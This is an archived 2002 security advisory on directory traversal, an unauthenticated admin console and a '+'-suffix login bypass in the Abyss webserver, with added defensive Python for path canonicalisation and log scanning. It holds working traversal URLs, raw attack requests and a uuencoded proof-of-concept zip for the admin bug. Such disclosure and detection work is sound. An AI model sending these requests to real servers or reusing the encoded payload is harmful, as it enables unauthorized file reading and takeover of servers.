23rd Aug 2002 [SBWID-5656]
COMMAND
Abyss webserver directory traversal and administration bugs
SYSTEMS AFFECTED
1.0.3 (patch 2) and previous, both Windows and Linux
PROBLEM
In Auriemma Luigi's [aluigi@pivx.com] PivX security advisory
[http://www.PivX.com]:
A] Directory traversal bug
==========================
The first problem I want to show is about viewing all the files on the
systems where Abyss 1.0.3 (patch 2) and previous run.
This problem is caused by the character '\' (%5c) not being checked as a
bad character, so the server follows the path in the URI that the
attacker gives until it reaches the requested file.
The following are two simple examples for viewing the winnt\win.ini file:
http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
"GET /\..\..\..\..\..\winnt\win.ini HTTP/1.0"
This last one is an HTTP request that can be sent with telnet, because
some browsers modify the "\.." characters.
It is also possible to view the index of the directories (but not the
root), ONLY if the AutoIndex option is not disabled (it is enabled by
default). This is for viewing winnt:
http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt/
On Linux, fortunately, the attacker cannot go down the path; he can only
go into the Abyss folder and see SOME files, for example the files in
the cgi-bin and chl directories, but NOT abyss.conf or the logs (this is
the same on Windows too). Two simple examples are:
http://host/%2f%2e%2e%2f
http://host/%2f%2e%2e%2fcgi-bin/
and we will see the index of the Abyss and cgi-bin folders.
B] Administration bug (fixed in patch 2 release)
================================================
The console used in Abyss is the same web server, bound to port 9999
(another default port can be 81), and it looks at the files in the CHL
directory of the server. This directory contains all the files needed to
manage the server remotely, so the administrator can change the
parameters without modifying the abyss.conf file manually.
This bug is really incredible... an attacker without a login can
reconfigure every parameter of the server. Some examples of what the
attacker can do are:
- Stop, Run and Halt the server
- change the username and password of the administrator
- change all the advanced parameters of the server (log files, number
of requests, etc.)
- everything the real administrator can do
The only limit for the attacker is that he cannot know the current
settings of the server, but I think that is not so important because
he can redefine them all! Remember that the attacker can redefine the
administrator login, and then he will be the real administrator.
The proof-of-concept can be downloaded from my userpage:
http://www.pivx.com/luigi/poc/abyss-adm.zip
C] Characters adding
====================
This is a problem that is widespread in almost all Windows
applications, and not only those.
The problem is that by adding some characters (in this case the '+') the
attacker can read, for example, the .chl files, bypassing the login. Not
a bad bug, but it is better to fix bugs like this before they can be used
for more dangerous exploitation.
Simple examples are:
http://host:9999/srvstatus.chl+
http://host:9999/consport.chl+
http://host:9999/conspass.chl+
http://host:9999/general.chl+
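The root cause behind A] and C] is the same: the server made its decisions on the raw request before turning it into one canonical filename, so a '\' slipped through the traversal filter and a trailing '+' slipped past the check that should have sent .chl pages to the login. The Python below is an added example written for this page, not Abyss code. It percent-decodes the request-target exactly once, treats '\' as a path separator, accepts only an explicit character set per segment (which rejects '..', '.chl+' and double-encoded input without any bad-character list), re-checks containment on the resolved path, and only then decides whether the canonical name is a protected console page. The docroot path and the .chl extension list are assumptions for the demonstration.

```python
import os
import re
from urllib.parse import unquote

# One path segment: alphanumerics, '_' and '-', with single dots between runs.
# This allow-list never matches '.', '..', a leading or trailing dot, or a
# trailing '+', so there is no bad-character list to keep up to date.
SEGMENT_RE = re.compile(r"^[A-Za-z0-9_-]+(\.[A-Za-z0-9_-]+)*$")

# Console pages that must only be served after a successful login (assumed
# extension list, taken from the .chl names in the advisory).
PROTECTED_EXTENSIONS = (".chl",)


def canonical_segments(request_target):
    """Percent-decode a request-target once and split it into path segments.

    Returns a list of segments, or None when the request must be refused:
    NUL bytes, a second layer of percent-encoding, or any segment outside
    the allow-list ('..', '.chl+', ...). Backslash is treated as a separator
    exactly like '/', which is what the affected Abyss versions did not do.
    """
    path = request_target.split("?", 1)[0]        # drop the query string
    decoded = unquote(path)
    if "\x00" in decoded or "%" in decoded:       # refuse double-encoded input
        return None
    decoded = decoded.replace("\\", "/")
    segments = []
    for seg in decoded.split("/"):
        if seg == "":                             # '//' or a trailing '/'
            continue
        if not SEGMENT_RE.match(seg):
            return None
        segments.append(seg)
    return segments


def resolve_request(docroot, request_target):
    """Map a request-target onto a file below docroot.

    Returns (filesystem_path, protected) or None. 'protected' is decided on
    the canonical name, so an extension check cannot be bypassed by padding
    the raw URI.
    """
    segments = canonical_segments(request_target)
    if segments is None:
        return None
    root = os.path.realpath(docroot)
    candidate = os.path.realpath(os.path.join(root, *segments))
    # Independent containment check: even if the allow-list above were ever
    # loosened, the resolved path must still lie inside the docroot.
    if candidate != root and not candidate.startswith(root + os.sep):
        return None
    protected = candidate.lower().endswith(PROTECTED_EXTENSIONS)
    return candidate, protected


if __name__ == "__main__":
    # Constructed docroot; the request-targets are the ones from the advisory.
    for target in ("/index.html",
                   "/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini",
                   "/%2f%2e%2e%2fcgi-bin/",
                   "/srvstatus.chl+",
                   "/srvstatus.chl"):
        print(f"{target!r:60} -> {resolve_request('/srv/www-example', target)}")
```

Rejecting '..' outright rather than resolving it is a deliberate choice: a browser never needs to send it, and refusing it removes the whole class of "how many levels up can I go" questions. The second containment check is redundant on purpose; it is the safety net if someone later relaxes SEGMENT_RE.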
3) The Code
A] Example of the directory traversal bug on Win:
http://host/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini
"GET /\..\..\..\..\..\winnt\win.ini HTTP/1.0"
Abyss index on Linux:
http://host/%2f%2e%2e%2f
B] For the administration bug, see the html file in my userpage:
http://www.pivx.com/luigi/poc/abyss-adm.zip
It can be used to test a server running on the same machine, at the
address 127.0.0.1. If you want to test other machines, simply replace
the string "http://127.0.0.1:9999" at line 4 of the html with the host
and the port you want.
C] Add the '+' character at the end of the requested file.
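For anyone checking old access logs for the three patterns in this advisory, here is an added Python scanner (not part of the advisory or of Abyss) run over a few constructed Common Log Format lines whose request-targets are the ones shown above. Abyss's own log layout may differ, so the line regex is an assumption; the classification works on the decoded request-target alone and can be reused with another line parser.

```python
import re
from urllib.parse import unquote

# Constructed sample access log in Common Log Format (not real Abyss output);
# the request-targets are the ones shown in the advisory.
SAMPLE_LOG = """\
10.0.0.5 - - [23/Aug/2002:10:01:02 +0000] "GET /index.html HTTP/1.0" 200 512
10.0.0.7 - - [23/Aug/2002:10:01:03 +0000] "GET /%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwinnt%5cwin.ini HTTP/1.0" 200 221
10.0.0.7 - - [23/Aug/2002:10:01:04 +0000] "GET /\\..\\..\\..\\..\\..\\winnt\\win.ini HTTP/1.0" 200 221
10.0.0.8 - - [23/Aug/2002:10:01:05 +0000] "GET /%2f%2e%2e%2fcgi-bin/ HTTP/1.0" 200 1033
10.0.0.9 - - [23/Aug/2002:10:01:06 +0000] "GET /srvstatus.chl+ HTTP/1.0" 200 740
10.0.0.9 - - [23/Aug/2002:10:01:07 +0000] "GET /conspass.chl HTTP/1.0" 200 612
"""

# Assumed CLF layout: client, ident, user, [timestamp], "request", status, size.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3})'
)
DOT_DOT_RE = re.compile(r"(^|[\\/])\.\.([\\/]|$)")          # a '..' segment after decoding
CONSOLE_PAGE_RE = re.compile(r"\.chl\b", re.I)               # any console (.chl) page
CHL_PADDING_RE = re.compile(r"\.chl[^/A-Za-z0-9]+$", re.I)   # '.chl' followed by junk


def classify(target):
    """Return the list of finding names for one request-target (empty if clean)."""
    decoded = unquote(target)
    findings = []
    if "\\" in decoded:
        findings.append("backslash-separator")     # '\' or %5c used as a separator
    if DOT_DOT_RE.search(decoded):
        findings.append("dot-dot-traversal")
    if CONSOLE_PAGE_RE.search(decoded):
        findings.append("console-page")            # informational: correlate by source
    if CHL_PADDING_RE.search(decoded):
        findings.append("chl-suffix-padding")      # e.g. 'srvstatus.chl+'
    return findings


def scan(log_text):
    """Return (client, target, status, findings) for every line with a finding."""
    hits = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue                               # not a request line we understand
        findings = classify(m.group("target"))
        if findings:
            hits.append((m.group("ip"), m.group("target"), m.group("status"), findings))
    return hits


if __name__ == "__main__":
    for ip, target, status, findings in scan(SAMPLE_LOG):
        print(f"{ip:10} {status} {', '.join(findings):45} {target}")
```

"console-page" is informational rather than an alert on its own: in the affected versions the console needed no login, so any source address that reaches .chl pages and is not the administrator's workstation is the thing to look at, and a 200 status on a traversal or padding request means the server actually served the file.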
UUEncode
begin 644 abyss-adm.zip
M4$L#!!0````(`)B*%2W]_OH0A`0``&<2```)````86)Y<W,N:'1MW5AM;]I(
M$/X>*?]ASJW4Y-3@O/1>BL`Z%YP&-0$$Y-K>AYX6>\$KV5[?[AK"O[\9&QL2
M4J"7.S6Z$`B[._/,VS.[ZS1"$T?.X4%CS#2'4/%)\_#@\,`*C4GKMGUV_DOM
M%%]G];?X8]&20Q^-L0P6,)[Z,I*J:;VX/*6714!&F(@[[GBA-9RAZ@6P(!:)
MT$8Q(V0"J9)R<H*_ODQ\GIJ&7:B@KL\3PU7NCM,(+YP&*UPJW9G/YS66*AZ)
M+*[Y,K8*.PV;.;NMA.=.PT9<&X$/#V9<:9(K7#Q*F?%#.#^&B;@#$W(89]/&
M6#GT1G?LB4P,?ADOP,V4X'',X#H34Y'+N'`U\"Z;5LQ$9&2=1;3R6RIF=X63
M#R8:MNNL8U=1=WLCKU[,MD*63#E@'KY2"@H%F(%()!S>@)R@UT(#E1/$!!8R
M@SE+#!@)AFL#$H-2H!?:\%@#2X+E3"J5T;7"Z`CC+F9E2DE$N1F&Q,81!Z8X
M4()C%FG0$CH0LAF'1!H0B1]E`0\H;S$<B23@=YC'B.O7P"+!\`\W?JU6.R[,
MK!>:2EUDXN3D9)F0?,(9<C4CCPTSF<X+5RI?]@8WX+9&G5ZW:=D:W;#@QAM=
M]=I-J]\;CG(:=KK]VQ&,/O>]IG75:;>]K@5=]P9'+W,'+?C=O;[%X9=B_&67
MUH`'0G'?5(KVOAI_>DI)M=+3:E9$5?/#:`-D>/ONIC.JI&%H9`HEYH\:1SM5
M!EFRTE!9LE/ABD5FI1'B*%>Q*=-;B]1"DDAD!['H6=;(+QQ\---[EHL@*+X2
MHXRYCW-U>(`Y\CYA7H>=/_#[3R7T4H,4*MB\B<LM8$MMW`P[N,U-'M6R0`SG
M@F)J5V6A]P%6E<W2@!F^2ZG%<,>,*B6_&.Y'"'>U"TL%D9R*!#0W1B33Y]G$
M_Q9!F*[:^7X.KBD']2TT.3\M+>3IJG!+=O01>BY5L,&UOCL<?NP-VIM`+TN=
MTS4T.BPXPZ/@9_!#IO1]='"G;-///4R<[33QS01=UN2_Y.E[GG#%HN?-S7]*
MR&D17,G'Y4DZD-)LX^&;JK:%`LEOD+$M_2S&PUM#GYEP/SB2W&0U[9[[;)[W
M.U_ET;O>ITTJD0.DM<$GBF6-3`0_])5(C7X%>S7MFKF+-6L/6_>BZH$!Q[L"
M]JV@)\I4X;58099GCQ[C/V)AY9SZ;DHWLL4CF;S5>-8MEY^<S^W>Z#P5KS2\
M^"%_<'^LL.A.D;$G^_(=.GFSC^W\'TQ_`U!+`0(4`!0````(`)B*%2W]_OH0
MA`0``&<2```)``````````$`(`"V@0````!A8GES<RYH=&U02P4&``````$`
,`0`W````JP0`````
`
end
1272 bytes
SOLUTION
Abyss 1.0.3 (patch 3) from the Aprelium web-site:
http://www.aprelium.com
or directly the updated executable:
http://www.aprelium.com/news/patch1033.html